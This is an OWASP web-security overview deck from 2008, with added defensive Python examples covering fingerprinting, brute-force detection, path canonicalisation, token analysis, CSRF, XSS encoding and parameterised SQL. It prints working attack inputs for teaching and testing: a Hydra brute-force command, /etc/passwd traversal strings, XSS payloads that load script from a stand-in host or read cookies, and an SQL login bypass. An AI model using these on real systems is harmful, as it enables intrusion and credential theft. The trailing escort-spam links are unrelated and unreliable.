OWASP Overview

Alberto Pastor Nieto
Informática Gesfor
March 2008

OWASP
The Open Web Application Security Project
OWASP Top Ten
OWASP Testing Guide (Tools demonstration)
OWASP
Open community
Interested in improving application security
Not affiliated with any technology company
OWASP Top Ten (2007)

1. Cross Site Scripting (XSS)
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
OWASP Testing Guide (Tools demonstration)

Information Gathering

Testing Web Application Fingerprint
Application Discovery
Spidering and Googling
SSL/TLS Testing
Testing for File Extensions Handling
Application Configuration Management Testing
Old, Backup and Unreferenced Files
Information Gathering
Testing Web Application Fingerprint

Different servers, and different versions of the same server, give different responses to the same request. Those differences identify the product even when the Server banner has been changed.

Information Gathering
Testing Web Application Fingerprint

  $ nc 202.41.76.251 80
  HEAD / HTTP/1.0

  HTTP/1.1 200 OK
  Date: Mon, 16 Jun 2003 02:53:29 GMT
  Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
  Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT
  ETag: "1813-49b-361b4df6"
  Accept-Ranges: bytes
  Content-Length: 1179
  Connection: close
  Content-Type: text/html

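The netcat session above only reads the banner. An added example, not code from the slides or from any OWASP tool, that goes one step further in the way the Testing Guide describes: it looks at header ordering in a normal response and at how the server answers a malformed request, and compares that behaviour with what the banner claims. The sample responses are constructed (the first mirrors the capture above); the version-specific rules are heuristics for Apache 1.3, IIS 5.0, Netscape Enterprise and SunONE, not a signature database.

```python
"""Added example (not from the slides): heuristic web-server fingerprinting.

Two rules from the OWASP Testing Guide's fingerprinting section:
 (1) header order in a normal response: Apache 1.3 emits Date before Server,
     IIS, Netscape Enterprise and SunONE emit Server before Date;
 (2) reply to a malformed request such as "GET / HTTP/3.0":
     Apache and SunONE answer 400, IIS 5.0 answers 200, Netscape Enterprise 505.
"""
import socket

PROBES = {
    "head": b"HEAD / HTTP/1.0\r\n\r\n",
    "bad_version": b"GET / HTTP/3.0\r\n\r\n",   # unsupported protocol version
}


def send_probe(host, port, payload, timeout=5.0):
    """Send one raw request and return the raw response (live use only)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_response(raw):
    """Return (status_code, header names in wire order, {name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    order, headers = [], {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            order.append(name.strip().lower())
            headers[name.strip().lower()] = value.strip()
    return status, order, headers


def guess_server(head_resp, bad_version_resp):
    """Combine banner, header order and malformed-request behaviour into one verdict."""
    _, order, headers = parse_response(head_resp)
    bad_status, _, _ = parse_response(bad_version_resp)
    banner = headers.get("server", "")
    date_before_server = ("date" in order and "server" in order
                          and order.index("date") < order.index("server"))
    if bad_status == 400 and date_before_server:
        family = "Apache"
    elif bad_status == 400:
        family = "SunONE"
    elif bad_status == 200 and not date_before_server:
        family = "IIS"
    elif bad_status == 505:
        family = "Netscape-Enterprise"
    else:
        family = "unknown"

    def norm(s):
        return s.lower().replace("-", "").replace(" ", "")

    # A banner that disagrees with behaviour was usually rewritten (mod_headers, a
    # reverse proxy, a WAF); behaviour is the harder thing to fake.
    consistent = family == "unknown" or norm(family) in norm(banner)
    return {"banner": banner, "family": family, "banner_consistent": consistent}


# Constructed sample responses; the first HEAD response mirrors the slide's capture.
SAMPLES = {
    "apache": (
        "HTTP/1.1 200 OK\r\nDate: Mon, 16 Jun 2003 02:53:29 GMT\r\n"
        "Server: Apache/1.3.3 (Unix) (Red Hat/Linux)\r\nContent-Type: text/html\r\n\r\n",
        "HTTP/1.1 400 Bad Request\r\nDate: Mon, 16 Jun 2003 02:53:30 GMT\r\n"
        "Server: Apache/1.3.3 (Unix) (Red Hat/Linux)\r\n\r\n",
    ),
    "iis": (
        "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
        "Date: Mon, 16 Jun 2003 02:53:29 GMT\r\nContent-Type: text/html\r\n\r\n",
        "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
        "Date: Mon, 16 Jun 2003 02:53:30 GMT\r\n\r\n",
    ),
    # Apache behaviour behind a banner rewritten to look like IIS.
    "masked": (
        "HTTP/1.1 200 OK\r\nDate: Mon, 16 Jun 2003 02:53:29 GMT\r\n"
        "Server: Microsoft-IIS/5.0\r\nContent-Type: text/html\r\n\r\n",
        "HTTP/1.1 400 Bad Request\r\nDate: Mon, 16 Jun 2003 02:53:30 GMT\r\n"
        "Server: Microsoft-IIS/5.0\r\n\r\n",
    ),
}


def fingerprint_samples():
    """Run the heuristic over the constructed samples (offline)."""
    return {name: guess_server(*pair) for name, pair in SAMPLES.items()}


def fingerprint_live(host, port=80):
    """Same heuristic against a host you are authorised to test."""
    return guess_server(send_probe(host, port, PROBES["head"]),
                        send_probe(host, port, PROBES["bad_version"]))


if __name__ == "__main__":
    for name, verdict in fingerprint_samples().items():
        print(name, verdict)
```

The "masked" sample is the case worth remembering: the banner says IIS, the behaviour says Apache, and the tester should believe the behaviour. httprint automates exactly this comparison with a much larger signature set.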
Information Gathering
Testing Web Application Fingerprint

Tools:
  Netcraft (http://www.netcraft.com)
  httprint (http://www.net-square.com/httprint/)

Information Gathering
Application Discovery

Related issues:
  Different base URL
  Non-standard ports
  Virtual hosts

Information Gathering
Application Discovery

Different base URL:
  Directory guessing and exploration
  Google (site:www.example.com)
  Candidate URLs from scanners (e.g. Nessus)

Information Gathering
Application Discovery

Non-standard ports (-P0 skips host discovery; current nmap spells it -Pn):
  nmap -P0 -sT -sV -p1-65535 192.168.1.100
  Interesting ports on 192.168.1.100:
  (The 65527 ports scanned but not shown below are in state: closed)
  PORT     STATE  SERVICE  VERSION
  22/tcp   open   ssh      OpenSSH 3.5p1 (protocol 1.99)
  80/tcp   open   http     Apache httpd 2.0.40 ((Red Hat Linux))
  443/tcp  open   ssl      OpenSSL
  901/tcp  open   http     Samba SWAT administration server

Information Gathering
Application Discovery

Virtual hosts:
  $ host -t ns www.owasp.org
  www.owasp.org is an alias for owasp.org.
  owasp.org name server ns1.secure.net.
  owasp.org name server ns2.secure.net.

  Other names served from the same address: http://searchdns.netcraft.com/?host

Information Gathering
Spidering and Googling

Spidering:
  wget -r http://www.example.com

Googling:
  googlegath.pl (http://www.nothink.org/perl/googlegath/)

Information Gathering
SSL/TLS Testing

Vulnerability scanners report:
  Expired certificates
  Weak ciphers
  ...

Other tools: OpenSSL, SSLDigger

Information Gathering
Testing for File Extensions Handling

Identify the underlying technologies from the file extensions in use.
Tools:
  wget
  curl
  web mirroring tools
  vulnerability scanners

Information Gathering
Application Configuration Management Testing

Typical files and well-known directories
Be careful with HTML comments
Custom error pages
Load only the modules you need
Minimal privileges
Log access, both successful and failed

Information Gathering
Old, Backup and Unreferenced Files

Site map and technology clues
Content clues
Practices:
  look into robots.txt and sitemap files
  public information (Google cache: and site: operators)
  search for files ending in ~, .old, .bak, ...

Information Gathering
Old, Backup and Unreferenced Files

Do not enable mod_autoindex or mod_info (hide unnecessary information)
Correct file permissions
Use chroot
Follow logging recommendations

Nessus
http://www.nessus.org

Port scanner
Vulnerability scanner

Business Logic Testing

Automated tools find it hard to understand context
Involve people who know the business logic
Thorough testing with realistic data

Authentication
Obtain User Accounts

Dictionary attacks
Brute-force attacks
Pattern-searching attacks

Authentication
Obtain User Accounts

Tools:
  John the Ripper
  Hydra
  Brutus
  Rainbow tables

Authentication
Obtain User Accounts

  raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &

  Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  Hydra (http://www.thc.org) starting at 2009-07-04 19:16:17
  [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task
  [DATA] attacking service http-post-form on port 443
  [STATUS] attack finished for wiki.intranet (waiting for childs to finish)
  [443] host: 10.0.0.1 login: owasp password: password
  [STATUS] attack finished for www.site.com (waiting for childs to finish)
  Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34

The module string is path:form body:failure marker; ^USER^ and ^PASS^ are substituted from the two word lists, and any response that does not contain "Not allowed" is reported as a valid login.

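From the defender's side, the run above is a burst of POSTs to the login URL from one source, 16 in parallel, with the same response size on every failure. An added example, not code from the slides or from Hydra, that finds such bursts in access logs: it parses Apache combined-format lines, counts login POSTs per source in a sliding window, and reports the number of distinct response sizes seen (a single size for dozens of attempts is typical of a scripted attack). The log lines are constructed; the login path and thresholds are assumptions.

```python
"""Added example (not from the slides): spotting a form brute force in access logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/index.cgi"   # assumed login endpoint, as in the Hydra command above
WINDOW_SECONDS = 60         # sliding window length
THRESHOLD = 20              # login POSTs per source per window before flagging

# Apache combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for a well-formed line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],
        "status": int(m.group("status")),
        "size": 0 if m.group("size") == "-" else int(m.group("size")),
    }


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: {"attempts": max POSTs in any window, "distinct_sizes": n}} for sources over the threshold."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == LOGIN_PATH:
            events[ev["ip"]].append(ev)
    flagged = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end, ev in enumerate(evs):           # two-pointer sliding window
            while (ev["ts"] - evs[start]["ts"]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = {"attempts": best,
                           "distinct_sizes": len({e["size"] for e in evs})}
    return flagged


def sample_log():
    """Constructed log: one source hammering the form at 10 POSTs/s, one normal user."""
    base = datetime(2009, 7, 4, 19, 16, 17, tzinfo=timezone.utc)  # timestamps as in the Hydra output
    lines = []
    for i in range(40):
        t = base + timedelta(seconds=i // 10)
        lines.append('10.0.0.99 - - [%s] "POST /index.cgi HTTP/1.1" 200 1342 "-" "Mozilla/4.0"'
                     % t.strftime("%d/%b/%Y:%H:%M:%S %z"))
    lines.append('10.0.0.5 - - [04/Jul/2009:19:16:20 +0000] "GET /index.cgi HTTP/1.1" 200 2211 "-" "Mozilla/5.0"')
    lines.append('10.0.0.5 - - [04/Jul/2009:19:16:25 +0000] "POST /index.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append("not a log line")
    return lines


if __name__ == "__main__":
    print(find_bruteforce(sample_log()))
```

Run it against a real access log with `find_bruteforce(open("access.log"))`. Rate alone is the crude signal; a low-and-slow attack stays under the threshold, so the distinct-size count and the failure-response marker in the application's own log are what make the verdict reliable.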
Authentication
Bypassing the authentication schema

• Direct page request
• Parameter modification
• Session ID prediction
• SQL injection

Authentication
Bypassing the authentication schema

Tools:
  WebScarab
  WebGoat (training)

Authentication
Directory traversal / file include

Known as "dot-dot-slash"

Two evaluation steps:
  Input vector enumeration
  Testing techniques

Authentication
Directory traversal / file include

Input vector enumeration:
  HTTP GET and POST request parameters
  File uploads
  HTML forms
  ...

Authentication
Directory traversal / file include

Testing techniques:
  http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
  Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
  http://example.com/index.php?file=http://www.owasp.org/malicioustxt

Careful with the character set: the server decodes these before using them, so a filter that looks for the literal "../" misses them.
  %2e%2e%2f is ../
  %2e%2e/ is ../
  ..%2f is ../
  %2e%2e%5c is ..\
  ..%5c is ..\
  %2e%2e is ..

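The list above is the tester's view; the matching fix is to canonicalise the parameter and then check where the resulting path lands. An added example, not code from the slides, that does this for the getUserProfile.jsp?item= case: repeated URL decoding (so double encoding such as %252e is caught), separator normalisation, rejection of null bytes and remote URLs, and a containment check on the normalised absolute path. The base directory is an assumption; posixpath is used so the result is the same on every platform.

```python
"""Added example (not from the slides): canonicalise a file-name parameter, then
check containment, so every encoding of "../" from the slide is refused by one test."""
import posixpath
from urllib.parse import unquote

PROFILE_DIR = "/var/www/app/profiles"   # assumed directory behind the 'item' parameter


def canonicalize(value, rounds=3):
    """URL-decode repeatedly (catches %252e double encoding) and unify separators."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def resolve_vulnerable(item):
    """The pattern behind getUserProfile.jsp?item=...: the parameter is trusted as-is."""
    return PROFILE_DIR + "/" + item


def resolve_safe(item):
    """Return an absolute path inside PROFILE_DIR, or None if the input must be refused."""
    decoded = canonicalize(item)
    if "\x00" in decoded or "://" in decoded:     # null-byte truncation, remote file include
        return None
    # posixpath.join discards the base when the second part is absolute ("/etc/passwd"),
    # so the containment check must run on the normalised result, never on the input.
    candidate = posixpath.normpath(posixpath.join(PROFILE_DIR, decoded))
    if candidate == PROFILE_DIR or posixpath.commonpath([PROFILE_DIR, candidate]) != PROFILE_DIR:
        return None
    return candidate


PAYLOADS = [                                   # the slide's variants plus double encoding
    "../../../../etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "..%5c..%5c..%5c..%5cetc%5cpasswd",
    "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "/etc/passwd",
    "profile.txt%00.jpg",
    "http://www.owasp.org/malicioustxt",
]


def check_payloads():
    """Map each payload to (path the vulnerable code would open, hardened result)."""
    return {p: (resolve_vulnerable(p), resolve_safe(p)) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (bad, good) in check_payloads().items():
        print("%-50s vulnerable=%s safe=%s" % (payload, bad, good))
    print(resolve_safe("alice.txt"))
```

Note what is deliberately absent: no blacklist of "../" strings. The decision is made on the final path, which is the only place where all encodings look the same.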
Authentication
Directory traversal / file include

Tools:
  WebScarab
  Paros
  Burp Suite

Authentication
Vulnerable remember-password and password reset

"Security questions":
  Multiple questions
  Strong questions (answers not found on a social network profile)
  Limited number of attempts
  CAPTCHA
  Send the reset link to the registered e-mail address

Authentication
Vulnerable remember-password and password reset

Careful with "remember password":
  <INPUT TYPE="password" AUTOCOMPLETE="off">

If the password has to live in a cookie, store it only in hashed form. A hash in a cookie is still a replayable credential, so a random, revocable token tied to the account is the safer design.

Session Management
Logout and Browser Cache Management Testing

Ending a web session:
• The user logs out
• The user remains idle for a certain amount of time and the application automatically logs him/her out

Session Management
Logout and Browser Cache Management Testing

Key: invalidate the server-side session
  Java: HttpSession.invalidate()

Session Management
Logout and Browser Cache Management Testing

Other practices:
  Clearly visible "end session" button
  Expire the cookies on the client side as well (server-side invalidation is still the control that matters)

Session Management
Logout and Browser Cache Management Testing

Tools:
  WebScarab
  Add N Edit Cookies (Firefox extension)
  Web Developer (Firefox extension)

Session Management
Analysis of the Session Management Schema

Session token analysis:
  Randomness
  Uniqueness
  Resistance to statistical analysis
  Resistance to cryptographic analysis

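An added example, not code from the slides or from any OWASP tool, of the first pass a tester makes over a few hundred collected tokens: uniqueness, alphabet size, a per-position entropy estimate, and a check for successive tokens that are numerically close (counters, timestamps, process IDs). Three token sets are constructed here. The third, sha256 of a counter, is the instructive one: it passes every statistical check below yet is fully predictable to anyone who knows the scheme, which is what the fourth bullet (resistance to cryptographic analysis) is about and what a black-box statistic cannot see.

```python
"""Added example (not from the slides): statistical first pass over session tokens."""
import hashlib
import math
import secrets
from collections import Counter


def per_position_entropy_bits(tokens):
    """Sum of Shannon entropy per character position: a crude upper bound on the key space."""
    width = min(len(t) for t in tokens)
    n = len(tokens)
    total = 0.0
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total -= sum(c / n * math.log2(c / n) for c in counts.values())
    return total


def looks_sequential(tokens, closeness=2 ** 16):
    """True if most successive tokens are numerically close (counter, timestamp, PID)."""
    try:
        values = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    diffs = [abs(b - a) for a, b in zip(values, values[1:])]
    return bool(diffs) and sum(d < closeness for d in diffs) / len(diffs) > 0.9


def analyse(tokens):
    """Report the four properties as far as they are visible from the outside."""
    return {
        "uniqueness": len(set(tokens)) / len(tokens),
        "alphabet": len(set("".join(tokens))),
        "entropy_bits": round(per_position_entropy_bits(tokens), 1),
        "sequential": looks_sequential(tokens),
    }


# Constructed token sets, 200 tokens each, in issue order.
COUNTER_TOKENS = ["%08x" % i for i in range(1000, 1200)]                 # plain counter
HASHED_COUNTER_TOKENS = [hashlib.sha256(b"sess%d" % i).hexdigest()[:32]    # sha256(counter)
                        for i in range(1000, 1200)]
RANDOM_TOKENS = [secrets.token_hex(16) for _ in range(200)]                # CSPRNG, 128 bits


def compare_sets():
    return {"counter": analyse(COUNTER_TOKENS),
            "hashed_counter": analyse(HASHED_COUNTER_TOKENS),
            "random": analyse(RANDOM_TOKENS)}


if __name__ == "__main__":
    for name, report in compare_sets().items():
        print(name, report)
```

The counter set fails immediately (a handful of bits of entropy, sequential). The hashed counter and the CSPRNG set are indistinguishable to this script; telling them apart needs either source review or guessing the construction and confirming it against observed tokens. That is the limit of tools like the ones listed below, and the reason a session-token finding should never be closed on statistics alone.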
Session Management
Cookie and Session Token Manipulation

Steps:
  Cookie collection
  Cookie reverse engineering
  Cookie manipulation

Session Management
Cookie and Session Token Manipulation

Tools:
  WebScarab
  CookieDigger

Session Management
Cross Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated.

Recommended practices:
  Add session-related information (an unguessable, session-bound token) to the request
  Use POST instead of GET (on its own this is not a defence: a hidden form on the attacker's page can submit a POST)
  Intermediate pages ("Are you sure you really want to do this?")
  Check the Referer header (defence in depth only: it can be missing)

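An added example, not code from the slides, that makes the first and last recommendations concrete: a per-session token issued with the form and required on submission, compared in constant time, with an Origin/Referer check as a second layer. Requests and sessions are plain dicts standing in for a framework, and the site origin is an assumption; the three requests in demo() are constructed.

```python
"""Added example (not from the slides): synchronizer-token CSRF protection."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.site.com"     # assumed application origin


def new_session():
    """A session carries a fresh, unguessable CSRF token for its whole lifetime."""
    return {"id": secrets.token_hex(16), "csrf_token": secrets.token_hex(32), "user": "owasp"}


def render_transfer_form(session):
    """The token travels as a hidden field; a page on another origin cannot read it."""
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="amount"><input type="submit"></form>' % session["csrf_token"])


def same_origin(headers):
    """Origin (preferred) or Referer must match the site; absence counts as a mismatch."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def handle_transfer(request, session):
    """Return 'ok' or a rejection reason. request = {'method', 'headers', 'form'}."""
    if request["method"] != "POST":                          # GET must never change state
        return "rejected: method"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return "rejected: csrf token"                        # constant-time comparison
    if not same_origin(request["headers"]):
        return "rejected: origin"
    return "ok"


def demo():
    """Constructed requests: a genuine submission and three forgeries."""
    victim, attacker = new_session(), new_session()
    genuine = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
               "form": {"csrf_token": victim["csrf_token"], "amount": "100"}}
    forged_no_token = {"method": "POST", "headers": {"Origin": "https://evil.example"},
                       "form": {"amount": "100"}}
    # The attacker knows his own token but the victim's browser sends the victim's cookie.
    forged_other_token = {"method": "POST", "headers": {"Origin": "https://evil.example"},
                          "form": {"csrf_token": attacker["csrf_token"], "amount": "100"}}
    forged_get = {"method": "GET", "headers": {}, "form": {"amount": "100"}}
    return {"genuine": handle_transfer(genuine, victim),
            "no_token": handle_transfer(forged_no_token, victim),
            "other_token": handle_transfer(forged_other_token, victim),
            "get": handle_transfer(forged_get, victim)}


if __name__ == "__main__":
    print(demo())
```

The token is the control; the origin check is there for the case where a token leaks through some other bug. A confirmation page without its own token does not help, since the attacker can forge the confirmation request as easily as the first one.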
Data Validation
XSS (Cross Site Scripting)

XSS: code injection attacks that target the various interpreters in the browser (HTML, JavaScript, ...).

  http://server/cgi-bin/testcgi.exe?<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>

  <script src=http://www.example.com/malicious-code.js></script>
  %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
  \x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e

Review all input vectors

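The three spellings above are one payload once the URL and JavaScript escapes are undone, which is why a filter that looks for the literal "<script" is not a fix. An added example, not code from the slides, that shows both halves: a canonicaliser that proves the three variants are equal, and contextual output encoding for the HTML body and attribute contexts, which is the actual defence. The page fragments are constructed.

```python
"""Added example (not from the slides): XSS payload canonicalisation and output encoding."""
import html
import re
from urllib.parse import unquote

PAYLOADS = [   # the three variants from the slide
    '<script src=http://www.example.com/malicious-code.js></script>',
    '%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e',
    r'\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e',
]


def canonicalize(value):
    """Undo URL encoding and JavaScript \\xNN escapes so all variants compare equal.
    This is for comparing and detecting, not for sanitising."""
    value = unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def render_vulnerable(name):
    """Reflects the parameter untouched (the testcgi.exe pattern on the slide)."""
    return "<p>Hello %s</p>" % name


def render_safe(name):
    """HTML-body context: encode &, <, >, quotes before the browser parses the page."""
    return "<p>Hello %s</p>" % html.escape(name, quote=True)


def render_attr_safe(name):
    """Attribute context: same encoding, and the attribute value must be quoted."""
    return '<input value="%s">' % html.escape(name, quote=True)


def demo():
    canon = {canonicalize(p) for p in PAYLOADS}
    return {
        "distinct_after_decoding": len(canon),
        "vulnerable_has_tag": "<script" in render_vulnerable(PAYLOADS[0]).lower(),
        "safe_has_tag": "<script" in render_safe(PAYLOADS[0]).lower(),
        "attr_breakout": '"><' in render_attr_safe('"><script>alert(1)</script>'),
    }


if __name__ == "__main__":
    print(demo())
    print(render_safe(PAYLOADS[0]))
```

Encoding must match the context the data lands in: html.escape is right for element content and quoted attributes, wrong for a JavaScript string or a URL, where a different encoder is needed. The OWASP Encoding Project listed at the end of the deck provides those per-context encoders.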
Data Validation
XSS (Cross Site Scripting)

Tools:
  OWASP CAL9000

Data Validation
SQL Injection

Insertion or "injection" of an SQL query via the input data from the client to the application.

Example:
  SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Input:
  $username = 1' or '1' = '1
  $password = 1' or '1' = '1

Resulting query:
  SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

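An added example, not code from the slides, that runs the query above both ways against an in-memory SQLite table: built by string concatenation, as on the slide, and with a parameterised statement. The table and its single row are constructed; the password is stored in clear only so the slide's query can be kept verbatim (a real system stores a salted hash, see "Insecure Cryptographic Storage" in the Top Ten).

```python
"""Added example (not from the slides): the slide's login query, vulnerable and fixed."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('owasp', 'password')")   # constructed row
    return db


def login_vulnerable(db, username, password):
    """Exactly the slide's pattern: user input is pasted into the SQL text."""
    sql = "SELECT * FROM Users WHERE Username='%s' AND Password='%s'" % (username, password)
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    """Placeholders keep the values out of the query grammar, so quotes are only data."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def demo():
    db = make_db()
    payload = "1' or '1' = '1"
    return {
        "vulnerable_bypass": login_vulnerable(db, payload, payload),  # logged in, no credentials
        "safe_bypass": login_safe(db, payload, payload),              # rejected
        "safe_valid": login_safe(db, "owasp", "password"),
        "safe_wrong": login_safe(db, "owasp", "wrong"),
    }


if __name__ == "__main__":
    print(demo())
```

Why the bypass works: AND binds tighter than OR, so the concatenated query reads `Username='1' OR ('1'='1' AND Password='1') OR '1'='1'`, and the trailing `OR '1'='1'` is true for every row. With the parameterised version the same text is a 15-character string compared against the Username column, nothing more.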
Data Validation
SQL Injection

Tools:
  OWASP SQLiX
  SQL Dumper

Data Validation
Other Injections

LDAP injection (Lightweight Directory Access Protocol)
ORM injection (Hibernate in Java, NHibernate in .NET, ActiveRecord in Ruby on Rails)
XML injection
SSI injection
XPath injection
IMAP/SMTP injection
OS command injection

Data Validation
Buffer overflow

Issues caused by buffer overflows:
  Denial of service (DoS)
  Code injection
  Code execution

Practices:
  Keep software up to date
  Follow secure-coding best practices (bounds checking, safe string functions)

Denial of Service

Account lockout turned against legitimate users (CAPTCHAs are the alternative to hard lockout)
Buffer overflows
User-specified object allocation
User input as a loop counter
Writing user-provided data to disk
Failure to release resources
Storing too much data in the session

Web Services

XML structural testing: overloading the XML parser
XML content-level testing: XML/SQL/XPath... injection
Validate input size
Naughty SOAP attachments testing
Man-in-the-middle testing

AJAX Testing

Increased attack surface with many more inputs to secure
Exposed internal functions of the application
Client access to third-party resources with no built-in security and encoding mechanisms
Failure to protect authentication information and sessions
Blurred line between client-side and server-side code, resulting in security mistakes

Useful Tools

OWASP Enterprise Security API (ESAPI)
OWASP Encoding Project (per-context output encoding of user-supplied data)
OWASP Stinger (HTTP request validation)
OWASP CSRFTester Project

Any questions?

OWASP: http://www.owasp.org
Romulus Project: http://www.ict-romulus.org
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
